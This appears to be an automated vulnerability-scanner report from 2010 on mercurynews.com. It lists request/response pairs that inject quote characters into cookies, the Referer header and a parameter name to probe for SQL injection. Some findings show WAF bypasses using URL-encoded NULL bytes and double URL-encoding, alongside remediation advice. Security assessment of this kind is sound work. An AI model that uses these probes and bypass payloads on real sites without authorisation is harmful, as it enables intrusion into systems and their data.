GET /crime-courts/ci_16792429?source=most_viewed HTTP/1.1 Host: www.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: currBrandCheck=mngimercurynews; UserType=Browser; JSESSIONID=4TAEQ3DHPIXDGCUUCBWCFFA; __g_c=w%3A1%7Cb%3A4%7Cc%3A280449122501380%7Cd%3A1%7Ca%3A0%7Ce%3A0.01%7Cf%3A0%2527; s_sq=%5B%5BB%5D%5D; UserID=CG3BTKSGEWDI4CUUCBWCFFI; fPage=false; u=COOKIE_NAME%3Du%3B280449122501380_1_0.01_0_5_1292194310310%3Dundefined%3BuserIdChange%3Dtrue%3BuserId%3DCG3BTKSGEWDI4CUUCBWCFFI%3BconPage%3Dfalse%3BaaPage%3Dfalse%3BloginConPage%3Dfalse%3BfPage%3Dfalse%3BvType%3D2%3BinitRegType%3DVoluntary%3B; s_cc=true; __g_u=280449122501380_1_0.01_0_5_1292194310310; Zvents=hikxwtryu4; fcspersistslider1=1; __qca=P0-326766520-1291762315669;
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html><head><META NAME='description' CONTENT='Prosecutors were barred from charging the Rev. Jerome Lindner with child molestation, even ...[SNIP]... g name, server, and channel on the next lines. */
s.pageName=FriendlyName; s.channel="Home"; // Same as prop1 s.server="";// Blank s.pageType=""; // Error pages ONLY
s.prop1="D=g";
s.prop2='D=ch+" / "+c43'; // Sub section 1
s.p ...[SNIP]...
Request 2
GET /crime-courts/ci_16792429?source=most_viewed HTTP/1.1 Host: www.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: currBrandCheck=mngimercurynews; UserType=Browser; JSESSIONID=4TAEQ3DHPIXDGCUUCBWCFFA; __g_c=w%3A1%7Cb%3A4%7Cc%3A280449122501380%7Cd%3A1%7Ca%3A0%7Ce%3A0.01%7Cf%3A0%2527%2527; s_sq=%5B%5BB%5D%5D; UserID=CG3BTKSGEWDI4CUUCBWCFFI; fPage=false; u=COOKIE_NAME%3Du%3B280449122501380_1_0.01_0_5_1292194310310%3Dundefined%3BuserIdChange%3Dtrue%3BuserId%3DCG3BTKSGEWDI4CUUCBWCFFI%3BconPage%3Dfalse%3BaaPage%3Dfalse%3BloginConPage%3Dfalse%3BfPage%3Dfalse%3BvType%3D2%3BinitRegType%3DVoluntary%3B; s_cc=true; __g_u=280449122501380_1_0.01_0_5_1292194310310; Zvents=hikxwtryu4; fcspersistslider1=1; __qca=P0-326766520-1291762315669;
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>302 Found</title> </head><body> <h1>Found</h1> <p>The document has moved <a href="http://www.mercurynews.com/crime-courts/ci_1679 ...[SNIP]...
The UserType cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the UserType cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request 1
GET /crime-courts/ci_16800051 HTTP/1.1 Host: www.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: currBrandCheck=mngimercurynews; UserType=Browser%00'; JSESSIONID=4TAEQ3DHPIXDGCUUCBWCFFA; __g_c=w%3A1%7Cb%3A4%7Cc%3A280449122501380%7Cd%3A1%7Ca%3A0%7Ce%3A0.01%7Cf%3A0; s_sq=%5B%5BB%5D%5D; UserID=CG3BTKSGEWDI4CUUCBWCFFI; fPage=false; u=COOKIE_NAME%3Du%3B280449122501380_1_0.01_0_5_1292194310310%3Dundefined%3BuserIdChange%3Dtrue%3BuserId%3DCG3BTKSGEWDI4CUUCBWCFFI%3BconPage%3Dfalse%3BaaPage%3Dfalse%3BloginConPage%3Dfalse%3BfPage%3Dfalse%3BvType%3D2%3BinitRegType%3DVoluntary%3B; s_cc=true; __g_u=280449122501380_1_0.01_0_5_1292194310310; Zvents=hikxwtryu4; fcspersistslider1=1; __qca=P0-326766520-1291762315669;
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html><head><META NAME='description' CONTENT='LOS ANGELES -- Authorities say three more people have been arrested for investigation of at ...[SNIP]... g name, server, and channel on the next lines. */
s.pageName=FriendlyName; s.channel="Home"; // Same as prop1 s.server="";// Blank s.pageType=""; // Error pages ONLY
s.prop1="D=g";
s.prop2='D=ch+" / "+c43'; // Sub section 1
s.p ...[SNIP]...
Request 2
GET /crime-courts/ci_16800051 HTTP/1.1 Host: www.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: currBrandCheck=mngimercurynews; UserType=Browser%00''; JSESSIONID=4TAEQ3DHPIXDGCUUCBWCFFA; __g_c=w%3A1%7Cb%3A4%7Cc%3A280449122501380%7Cd%3A1%7Ca%3A0%7Ce%3A0.01%7Cf%3A0; s_sq=%5B%5BB%5D%5D; UserID=CG3BTKSGEWDI4CUUCBWCFFI; fPage=false; u=COOKIE_NAME%3Du%3B280449122501380_1_0.01_0_5_1292194310310%3Dundefined%3BuserIdChange%3Dtrue%3BuserId%3DCG3BTKSGEWDI4CUUCBWCFFI%3BconPage%3Dfalse%3BaaPage%3Dfalse%3BloginConPage%3Dfalse%3BfPage%3Dfalse%3BvType%3D2%3BinitRegType%3DVoluntary%3B; s_cc=true; __g_u=280449122501380_1_0.01_0_5_1292194310310; Zvents=hikxwtryu4; fcspersistslider1=1; __qca=P0-326766520-1291762315669;
Response 2 (redirected)
HTTP/1.1 302 Moved Temporarily Server: Apache/2.0.52 (Red Hat) Location: https://secure.passport.mnginteractive.com/mngi/servletDispatch/ErightsPassportServlet.dyn?url=http://www.mercurynews.com/crime-courts/ci_16800051?nclick_check=1&forced=true Vary: Accept-encoding Expires: Wed, 08 Dec 2010 06:37:41 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Wed, 08 Dec 2010 06:37:41 GMT Connection: close Connection: Transfer-Encoding Content-Type: text/html;charset=UTF-8 Content-Length: 447
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>302 Found</title> </head><body> <h1>Found</h1> <p>The document has moved <a href="https://secure.passport.mnginteractive.com/mngi ...[SNIP]...
The __g_u cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the __g_u cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request 1
GET /entertainment/ci_16753906 HTTP/1.1 Host: www.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: currBrandCheck=mngimercurynews; UserType=Browser; JSESSIONID=4TAEQ3DHPIXDGCUUCBWCFFA; __g_c=w%3A1%7Cb%3A4%7Cc%3A280449122501380%7Cd%3A1%7Ca%3A0%7Ce%3A0.01%7Cf%3A0; s_sq=%5B%5BB%5D%5D; UserID=CG3BTKSGEWDI4CUUCBWCFFI; fPage=false; u=COOKIE_NAME%3Du%3B280449122501380_1_0.01_0_5_1292194310310%3Dundefined%3BuserIdChange%3Dtrue%3BuserId%3DCG3BTKSGEWDI4CUUCBWCFFI%3BconPage%3Dfalse%3BaaPage%3Dfalse%3BloginConPage%3Dfalse%3BfPage%3Dfalse%3BvType%3D2%3BinitRegType%3DVoluntary%3B; s_cc=true; __g_u=280449122501380_1_0.01_0_5_1292194310310%00'; Zvents=hikxwtryu4; fcspersistslider1=1; __qca=P0-326766520-1291762315669;
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html><head><META NAME='description' CONTENT='John Grishams first young adult novel, predictably about a 13-year-old legal beagle wh ...[SNIP]... g name, server, and channel on the next lines. */
s.pageName=FriendlyName; s.channel="Home"; // Same as prop1 s.server="";// Blank s.pageType=""; // Error pages ONLY
s.prop1="D=g";
s.prop2='D=ch+" / "+c43'; // Sub section 1
s.prop3=""; // Sub sect ...[SNIP]... <a href="http://www.insidebayarea.com/holdays-2009/ci_13866290" target="_blank" style="width:184px">From luxury on the cheap to can't-fail video games</a> ...[SNIP]...
Request 2
GET /entertainment/ci_16753906 HTTP/1.1 Host: www.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: currBrandCheck=mngimercurynews; UserType=Browser; JSESSIONID=4TAEQ3DHPIXDGCUUCBWCFFA; __g_c=w%3A1%7Cb%3A4%7Cc%3A280449122501380%7Cd%3A1%7Ca%3A0%7Ce%3A0.01%7Cf%3A0; s_sq=%5B%5BB%5D%5D; UserID=CG3BTKSGEWDI4CUUCBWCFFI; fPage=false; u=COOKIE_NAME%3Du%3B280449122501380_1_0.01_0_5_1292194310310%3Dundefined%3BuserIdChange%3Dtrue%3BuserId%3DCG3BTKSGEWDI4CUUCBWCFFI%3BconPage%3Dfalse%3BaaPage%3Dfalse%3BloginConPage%3Dfalse%3BfPage%3Dfalse%3BvType%3D2%3BinitRegType%3DVoluntary%3B; s_cc=true; __g_u=280449122501380_1_0.01_0_5_1292194310310%00''; Zvents=hikxwtryu4; fcspersistslider1=1; __qca=P0-326766520-1291762315669;
Response 2 (redirected)
HTTP/1.1 302 Moved Temporarily Server: Apache/2.0.52 (Red Hat) Location: https://secure.passport.mnginteractive.com/mngi/servletDispatch/ErightsPassportServlet.dyn?url=http://www.mercurynews.com/entertainment/ci_16753906?nclick_check=1&forced=true Vary: Accept-encoding Expires: Wed, 08 Dec 2010 06:39:40 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Wed, 08 Dec 2010 06:39:40 GMT Connection: close Connection: Transfer-Encoding Content-Type: text/html;charset=UTF-8 Content-Length: 448
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>302 Found</title> </head><body> <h1>Found</h1> <p>The document has moved <a href="https://secure.passport.mnginteractive.com/mngi ...[SNIP]...
The fPage cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the fPage cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request 1
GET /entertainment/ci_16753906 HTTP/1.1 Host: www.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: currBrandCheck=mngimercurynews; UserType=Browser; JSESSIONID=4TAEQ3DHPIXDGCUUCBWCFFA; __g_c=w%3A1%7Cb%3A4%7Cc%3A280449122501380%7Cd%3A1%7Ca%3A0%7Ce%3A0.01%7Cf%3A0; s_sq=%5B%5BB%5D%5D; UserID=CG3BTKSGEWDI4CUUCBWCFFI; fPage=false%00'; u=COOKIE_NAME%3Du%3B280449122501380_1_0.01_0_5_1292194310310%3Dundefined%3BuserIdChange%3Dtrue%3BuserId%3DCG3BTKSGEWDI4CUUCBWCFFI%3BconPage%3Dfalse%3BaaPage%3Dfalse%3BloginConPage%3Dfalse%3BfPage%3Dfalse%3BvType%3D2%3BinitRegType%3DVoluntary%3B; s_cc=true; __g_u=280449122501380_1_0.01_0_5_1292194310310; Zvents=hikxwtryu4; fcspersistslider1=1; __qca=P0-326766520-1291762315669;
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html><head><META NAME='description' CONTENT='John Grishams first young adult novel, predictably about a 13-year-old legal beagle wh ...[SNIP]... g name, server, and channel on the next lines. */
s.pageName=FriendlyName; s.channel="Home"; // Same as prop1 s.server="";// Blank s.pageType=""; // Error pages ONLY
s.prop1="D=g";
s.prop2='D=ch+" / "+c43'; // Sub section 1
s.prop3=""; // Sub sect ...[SNIP]... <a href="http://www.insidebayarea.com/holdays-2009/ci_13866290" target="_blank" style="width:184px">From luxury on the cheap to can't-fail video games</a> ...[SNIP]...
Request 2
GET /entertainment/ci_16753906 HTTP/1.1 Host: www.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: currBrandCheck=mngimercurynews; UserType=Browser; JSESSIONID=4TAEQ3DHPIXDGCUUCBWCFFA; __g_c=w%3A1%7Cb%3A4%7Cc%3A280449122501380%7Cd%3A1%7Ca%3A0%7Ce%3A0.01%7Cf%3A0; s_sq=%5B%5BB%5D%5D; UserID=CG3BTKSGEWDI4CUUCBWCFFI; fPage=false%00''; u=COOKIE_NAME%3Du%3B280449122501380_1_0.01_0_5_1292194310310%3Dundefined%3BuserIdChange%3Dtrue%3BuserId%3DCG3BTKSGEWDI4CUUCBWCFFI%3BconPage%3Dfalse%3BaaPage%3Dfalse%3BloginConPage%3Dfalse%3BfPage%3Dfalse%3BvType%3D2%3BinitRegType%3DVoluntary%3B; s_cc=true; __g_u=280449122501380_1_0.01_0_5_1292194310310; Zvents=hikxwtryu4; fcspersistslider1=1; __qca=P0-326766520-1291762315669;
Response 2 (redirected)
HTTP/1.1 302 Moved Temporarily Server: Apache/2.0.52 (Red Hat) Location: https://secure.passport.mnginteractive.com/mngi/servletDispatch/ErightsPassportServlet.dyn?url=http://www.mercurynews.com/entertainment/ci_16753906?nclick_check=1&forced=true Vary: Accept-encoding Expires: Wed, 08 Dec 2010 06:39:10 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Wed, 08 Dec 2010 06:39:10 GMT Connection: close Connection: Transfer-Encoding Content-Type: text/html;charset=UTF-8 Content-Length: 448
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>302 Found</title> </head><body> <h1>Found</h1> <p>The document has moved <a href="https://secure.passport.mnginteractive.com/mngi ...[SNIP]...
The Referer HTTP header appears to be vulnerable to SQL injection attacks. A single quote was submitted in the Referer HTTP header, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
Request 1
GET /entertainment/ci_16777054 HTTP/1.1 Host: www.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: currBrandCheck=mngimercurynews; UserType=Browser; JSESSIONID=4TAEQ3DHPIXDGCUUCBWCFFA; __g_c=w%3A1%7Cb%3A4%7Cc%3A280449122501380%7Cd%3A1%7Ca%3A0%7Ce%3A0.01%7Cf%3A0; s_sq=%5B%5BB%5D%5D; UserID=CG3BTKSGEWDI4CUUCBWCFFI; fPage=false; u=COOKIE_NAME%3Du%3B280449122501380_1_0.01_0_5_1292194310310%3Dundefined%3BuserIdChange%3Dtrue%3BuserId%3DCG3BTKSGEWDI4CUUCBWCFFI%3BconPage%3Dfalse%3BaaPage%3Dfalse%3BloginConPage%3Dfalse%3BfPage%3Dfalse%3BvType%3D2%3BinitRegType%3DVoluntary%3B; s_cc=true; __g_u=280449122501380_1_0.01_0_5_1292194310310; Zvents=hikxwtryu4; fcspersistslider1=1; __qca=P0-326766520-1291762315669; Referer: http://www.google.com/search?hl=en&q='
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html><head><META NAME='description' CONTENT='The former Pink Floyd leaders $60 million "The Wall Live" tour is every bit as good as ...[SNIP]... g name, server, and channel on the next lines. */
s.pageName=FriendlyName; s.channel="Home"; // Same as prop1 s.server="";// Blank s.pageType=""; // Error pages ONLY
s.prop1="D=g";
s.prop2='D=ch+" / "+c43'; // Sub section 1
s.prop3=""; // Sub sect ...[SNIP]... "Wall" are both literally and figuratively put into place. Dealing with his father's death ("The Thin Ice"), an overly protective "Mother," sadistic teachers ("Another Brick in the Wall Part 2") and a failing marriage ("Empty Spaces") are all bricks -- and as he delivers the details in song, a stage crew erects actual bricks onstage. Slowly, but surely, Waters and his crew are blocked from our view.</p> ...[SNIP]...
Request 2
GET /entertainment/ci_16777054 HTTP/1.1 Host: www.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: currBrandCheck=mngimercurynews; UserType=Browser; JSESSIONID=4TAEQ3DHPIXDGCUUCBWCFFA; __g_c=w%3A1%7Cb%3A4%7Cc%3A280449122501380%7Cd%3A1%7Ca%3A0%7Ce%3A0.01%7Cf%3A0; s_sq=%5B%5BB%5D%5D; UserID=CG3BTKSGEWDI4CUUCBWCFFI; fPage=false; u=COOKIE_NAME%3Du%3B280449122501380_1_0.01_0_5_1292194310310%3Dundefined%3BuserIdChange%3Dtrue%3BuserId%3DCG3BTKSGEWDI4CUUCBWCFFI%3BconPage%3Dfalse%3BaaPage%3Dfalse%3BloginConPage%3Dfalse%3BfPage%3Dfalse%3BvType%3D2%3BinitRegType%3DVoluntary%3B; s_cc=true; __g_u=280449122501380_1_0.01_0_5_1292194310310; Zvents=hikxwtryu4; fcspersistslider1=1; __qca=P0-326766520-1291762315669; Referer: http://www.google.com/search?hl=en&q=''
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>302 Found</title> </head><body> <h1>Found</h1> <p>The document has moved <a href="http://www.mercurynews.com/entertainment/ci_167 ...[SNIP]...
1.220. http://www.mercurynews.com/entertainment/ci_16799215 [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Tentative
Host:
http://www.mercurynews.com
Path:
/entertainment/ci_16799215
Issue detail
The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.
Remediation detail
There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request 1
GET /entertainment/ci_16799215?1%2527=1 HTTP/1.1 Host: www.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: currBrandCheck=mngimercurynews; UserType=Browser; JSESSIONID=4TAEQ3DHPIXDGCUUCBWCFFA; __g_c=w%3A1%7Cb%3A4%7Cc%3A280449122501380%7Cd%3A1%7Ca%3A0%7Ce%3A0.01%7Cf%3A0; s_sq=%5B%5BB%5D%5D; UserID=CG3BTKSGEWDI4CUUCBWCFFI; fPage=false; u=COOKIE_NAME%3Du%3B280449122501380_1_0.01_0_5_1292194310310%3Dundefined%3BuserIdChange%3Dtrue%3BuserId%3DCG3BTKSGEWDI4CUUCBWCFFI%3BconPage%3Dfalse%3BaaPage%3Dfalse%3BloginConPage%3Dfalse%3BfPage%3Dfalse%3BvType%3D2%3BinitRegType%3DVoluntary%3B; s_cc=true; __g_u=280449122501380_1_0.01_0_5_1292194310310; Zvents=hikxwtryu4; fcspersistslider1=1; __qca=P0-326766520-1291762315669;
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html><head><META NAME='description' CONTENT='Theyre televisions version of misfit toys: Perfectly sound, high-quality shows th ...[SNIP]... g name, server, and channel on the next lines. */
s.pageName=FriendlyName; s.channel="Home"; // Same as prop1 s.server="";// Blank s.pageType=""; // Error pages ONLY
s.prop1="D=g";
s.prop2='D=ch+" / "+c43'; // Sub section 1
s.prop3=""; // Sub sect ...[SNIP]...
Request 2
GET /entertainment/ci_16799215?1%2527%2527=1 HTTP/1.1 Host: www.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: currBrandCheck=mngimercurynews; UserType=Browser; JSESSIONID=4TAEQ3DHPIXDGCUUCBWCFFA; __g_c=w%3A1%7Cb%3A4%7Cc%3A280449122501380%7Cd%3A1%7Ca%3A0%7Ce%3A0.01%7Cf%3A0; s_sq=%5B%5BB%5D%5D; UserID=CG3BTKSGEWDI4CUUCBWCFFI; fPage=false; u=COOKIE_NAME%3Du%3B280449122501380_1_0.01_0_5_1292194310310%3Dundefined%3BuserIdChange%3Dtrue%3BuserId%3DCG3BTKSGEWDI4CUUCBWCFFI%3BconPage%3Dfalse%3BaaPage%3Dfalse%3BloginConPage%3Dfalse%3BfPage%3Dfalse%3BvType%3D2%3BinitRegType%3DVoluntary%3B; s_cc=true; __g_u=280449122501380_1_0.01_0_5_1292194310310; Zvents=hikxwtryu4; fcspersistslider1=1; __qca=P0-326766520-1291762315669;
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>302 Found</title> </head><body> <h1>Found</h1> <p>The document has moved <a href="http://www.mercurynews.com/entertainment/ci_167 ...[SNIP]...
The Zvents cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the Zvents cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request 1
GET /entertainment/ci_16800206 HTTP/1.1 Host: www.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: currBrandCheck=mngimercurynews; UserType=Browser; JSESSIONID=4TAEQ3DHPIXDGCUUCBWCFFA; __g_c=w%3A1%7Cb%3A4%7Cc%3A280449122501380%7Cd%3A1%7Ca%3A0%7Ce%3A0.01%7Cf%3A0; s_sq=%5B%5BB%5D%5D; UserID=CG3BTKSGEWDI4CUUCBWCFFI; fPage=false; u=COOKIE_NAME%3Du%3B280449122501380_1_0.01_0_5_1292194310310%3Dundefined%3BuserIdChange%3Dtrue%3BuserId%3DCG3BTKSGEWDI4CUUCBWCFFI%3BconPage%3Dfalse%3BaaPage%3Dfalse%3BloginConPage%3Dfalse%3BfPage%3Dfalse%3BvType%3D2%3BinitRegType%3DVoluntary%3B; s_cc=true; __g_u=280449122501380_1_0.01_0_5_1292194310310; Zvents=hikxwtryu4%00'; fcspersistslider1=1; __qca=P0-326766520-1291762315669;
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html><head><META NAME='description' CONTENT='Cal Performances announces a revival of Philip Glass seminal opera, Einstein on t ...[SNIP]... g name, server, and channel on the next lines. */
s.pageName=FriendlyName; s.channel="Home"; // Same as prop1 s.server="";// Blank s.pageType=""; // Error pages ONLY
s.prop1="D=g";
s.prop2='D=ch+" / "+c43'; // Sub section 1
s.prop3=""; // Sub sect ...[SNIP]...
Request 2
GET /entertainment/ci_16800206 HTTP/1.1 Host: www.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: currBrandCheck=mngimercurynews; UserType=Browser; JSESSIONID=4TAEQ3DHPIXDGCUUCBWCFFA; __g_c=w%3A1%7Cb%3A4%7Cc%3A280449122501380%7Cd%3A1%7Ca%3A0%7Ce%3A0.01%7Cf%3A0; s_sq=%5B%5BB%5D%5D; UserID=CG3BTKSGEWDI4CUUCBWCFFI; fPage=false; u=COOKIE_NAME%3Du%3B280449122501380_1_0.01_0_5_1292194310310%3Dundefined%3BuserIdChange%3Dtrue%3BuserId%3DCG3BTKSGEWDI4CUUCBWCFFI%3BconPage%3Dfalse%3BaaPage%3Dfalse%3BloginConPage%3Dfalse%3BfPage%3Dfalse%3BvType%3D2%3BinitRegType%3DVoluntary%3B; s_cc=true; __g_u=280449122501380_1_0.01_0_5_1292194310310; Zvents=hikxwtryu4%00''; fcspersistslider1=1; __qca=P0-326766520-1291762315669;
Response 2 (redirected)
HTTP/1.1 302 Moved Temporarily Server: Apache/2.0.52 (Red Hat) Location: https://secure.passport.mnginteractive.com/mngi/servletDispatch/ErightsPassportServlet.dyn?url=http://www.mercurynews.com/entertainment/ci_16800206?nclick_check=1&forced=true Vary: Accept-encoding Expires: Wed, 08 Dec 2010 06:39:24 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Wed, 08 Dec 2010 06:39:24 GMT Connection: close Connection: Transfer-Encoding Content-Type: text/html;charset=UTF-8 Content-Length: 448
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>302 Found</title> </head><body> <h1>Found</h1> <p>The document has moved <a href="https://secure.passport.mnginteractive.com/mngi ...[SNIP]...
The s_sq cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the s_sq cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
Request 1
GET /giants/ci_16745927?nclick_check=1 HTTP/1.1 Host: www.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: currBrandCheck=mngimercurynews; UserType=Browser; JSESSIONID=4TAEQ3DHPIXDGCUUCBWCFFA; __g_c=w%3A1%7Cb%3A4%7Cc%3A280449122501380%7Cd%3A1%7Ca%3A0%7Ce%3A0.01%7Cf%3A0; s_sq=%5B%5BB%5D%5D'; UserID=CG3BTKSGEWDI4CUUCBWCFFI; fPage=false; u=COOKIE_NAME%3Du%3B280449122501380_1_0.01_0_5_1292194310310%3Dundefined%3BuserIdChange%3Dtrue%3BuserId%3DCG3BTKSGEWDI4CUUCBWCFFI%3BconPage%3Dfalse%3BaaPage%3Dfalse%3BloginConPage%3Dfalse%3BfPage%3Dfalse%3BvType%3D2%3BinitRegType%3DVoluntary%3B; s_cc=true; __g_u=280449122501380_1_0.01_0_5_1292194310310; Zvents=hikxwtryu4; fcspersistslider1=1; __qca=P0-326766520-1291762315669;
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html><head><META NAME='description' CONTENT='Veteran shortstop who once energized Oakland As will return to Bay Area in fading ligh ...[SNIP]... g name, server, and channel on the next lines. */
s.pageName=FriendlyName; s.channel="Home"; // Same as prop1 s.server="";// Blank s.pageType=""; // Error pages ONLY
s.prop1="D=g";
s.prop2='D=ch+" / "+c43'; // Sub section 1
s.p ...[SNIP]...
Request 2
GET /giants/ci_16745927?nclick_check=1 HTTP/1.1 Host: www.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: currBrandCheck=mngimercurynews; UserType=Browser; JSESSIONID=4TAEQ3DHPIXDGCUUCBWCFFA; __g_c=w%3A1%7Cb%3A4%7Cc%3A280449122501380%7Cd%3A1%7Ca%3A0%7Ce%3A0.01%7Cf%3A0; s_sq=%5B%5BB%5D%5D''; UserID=CG3BTKSGEWDI4CUUCBWCFFI; fPage=false; u=COOKIE_NAME%3Du%3B280449122501380_1_0.01_0_5_1292194310310%3Dundefined%3BuserIdChange%3Dtrue%3BuserId%3DCG3BTKSGEWDI4CUUCBWCFFI%3BconPage%3Dfalse%3BaaPage%3Dfalse%3BloginConPage%3Dfalse%3BfPage%3Dfalse%3BvType%3D2%3BinitRegType%3DVoluntary%3B; s_cc=true; __g_u=280449122501380_1_0.01_0_5_1292194310310; Zvents=hikxwtryu4; fcspersistslider1=1; __qca=P0-326766520-1291762315669;
Response 2
HTTP/1.1 302 Moved Temporarily Server: Apache/2.0.52 (Red Hat) Location: https://secure.passport.mnginteractive.com/mngi/servletDispatch/ErightsPassportServlet.dyn?url=http://www.mercurynews.com/giants/ci_16745927?nclick_check=1&forced=true Vary: Accept-encoding Expires: Wed, 08 Dec 2010 07:17:47 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Wed, 08 Dec 2010 07:17:47 GMT Connection: close Connection: Transfer-Encoding Content-Type: text/html;charset=UTF-8 Content-Length: 441
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>302 Found</title> </head><body> <h1>Found</h1> <p>The document has moved <a href="https://secure.passport.mnginteractive.com/mngi ...[SNIP]...
